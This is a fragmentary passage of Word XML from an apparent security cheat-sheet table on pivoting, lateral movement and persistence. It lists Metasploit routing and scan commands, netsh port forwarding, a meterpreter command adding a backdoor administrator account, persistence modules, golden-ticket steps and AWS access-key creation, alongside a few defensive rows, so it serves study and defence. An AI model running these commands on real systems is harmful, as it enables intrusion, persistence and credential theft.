        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6FE014" w14:textId="2D8BC9D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F0F0310" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5B4223FA" w14:textId="32535C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 xml:space="preserve">Allow list execution control with AppLocker or </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>third party</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tools</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FF7178"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UEBA logging and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>monitioring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5935D1" w14:textId="66CB4A7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5385B06E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF55693" w14:textId="431D49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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C1772E" w14:textId="1FF5BA9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12126CD3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ACE48CC" w14:textId="2DA6F9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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B453F75" w14:textId="3104CFA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72F14CA" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E5940C" w14:textId="79BF69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portfwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A592F26" w14:textId="209F49D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539A4C37" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="743D6B29" w14:textId="3F484C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route add 10.10.10.10/34 1  set RHOST 10.10.10.100  exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F7620A" w14:textId="19E0362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164C0A0F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="616ACABF" w14:textId="53A236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run </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>arp_scanner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -r 10.10.10.0/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559D214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route add 10.10.10.0/24 1  use auxiliary/scanner/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>portscan</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tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  set RHOSTS 10.10.10.1,11,100  set PORTS 22,25,80,135,445,631  run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D36594D" w14:textId="4989BAA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0CACC0" w14:textId="35F39E8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3E83A595" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E2A9FC9" w14:textId="1109F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08D34243" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5B74160D" w14:textId="462B4E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Port Forwarding with netsh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F7ED129" w14:textId="0860A20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netsh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> interface </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>portproxy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> add v4tov4 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>listenaddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">=0.0.0.0 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>listenport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">=8000 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>connectaddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">=10.10.10.100 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>connectport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=80  netstat -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nato</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> | findstr:8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F2ABC9B" w14:textId="69CE785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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="63B38724" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BA1A6BC" w14:textId="067AC4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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FBBDDE6" w14:textId="30EBF78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0EF37E4A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79545095" w14:textId="2ED3F4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Visual Summary: Pivoting and Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A46289" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6764E5BA" w14:textId="6783BFE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2B027766" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2E408A71" w14:textId="495C9E3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LLMNR Link-Local Multicast Name Resolution  Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0323BF" w14:textId="44669E5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0E6928E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18AB5880" w14:textId="012D9D9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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC08E8C" w14:textId="2FD484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39A88E1A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="289108F6" w14:textId="4E0256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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DABE441" w14:textId="06F01F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73B565FB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="12604806" w14:textId="4AAB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402415F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11164326" w14:textId="2B421D4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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E1AD11D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D503E1" w14:textId="6F93B62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10EDC9B5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1592DE10" w14:textId="69B1F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035D8468" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0D5FE75E" w14:textId="6A7F9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Create Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="333BC6FC" w14:textId="455913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meterpreter&gt; execute -f "net user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Att@ckerPssw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">"  execute -f "net </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>localgroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> administrator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execute -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -f "net user"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="174D701D" w14:textId="33DC185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03864985" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35AD42BA" w14:textId="3CB7EB6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msf6&gt; use exploit/windows/local/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>persistence_service</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="516591B6" w14:textId="1D9DFE9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3F17BC9C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="51BF3747" w14:textId="76CEFB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mofcomp</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vmi.mof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2FB86EF8" w14:textId="3CE5CD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use exploit/windows/local/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>wmi_persistence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5185E135" w14:textId="513DE4C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5E598676" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0CAB725C" w14:textId="7D84EE9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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570AAE5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-Retrieves </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>krbtgt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> user password (root of trust) hash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4294E7F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-Forges Ticket Granting Ticket using hash (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mimikatz</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Impacket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659438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-Authenticates to any </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kerbero</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> service"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="284EE40D" w14:textId="025458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250E31AA" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B884252" w14:textId="6FC2DD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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D83F0B" w14:textId="53C19C7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34B850BF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2C940912" w14:textId="21C295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list-users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462CC7DD" w14:textId="3BA5863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list-access-key --user-name </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>jsmith</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create-access-key --user-name </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>jsmith</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EFC3856" w14:textId="459B45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B282179" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DFE6E1B" w14:textId="40E390A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Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D2B68F" w14:textId="581A21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Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WMIObject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Namespace root\Subscription -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Class_EventFilter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>fl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -property query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62B260FE" w14:textId="70C4925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01B17945" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D98FBA5" w14:textId="75308A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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
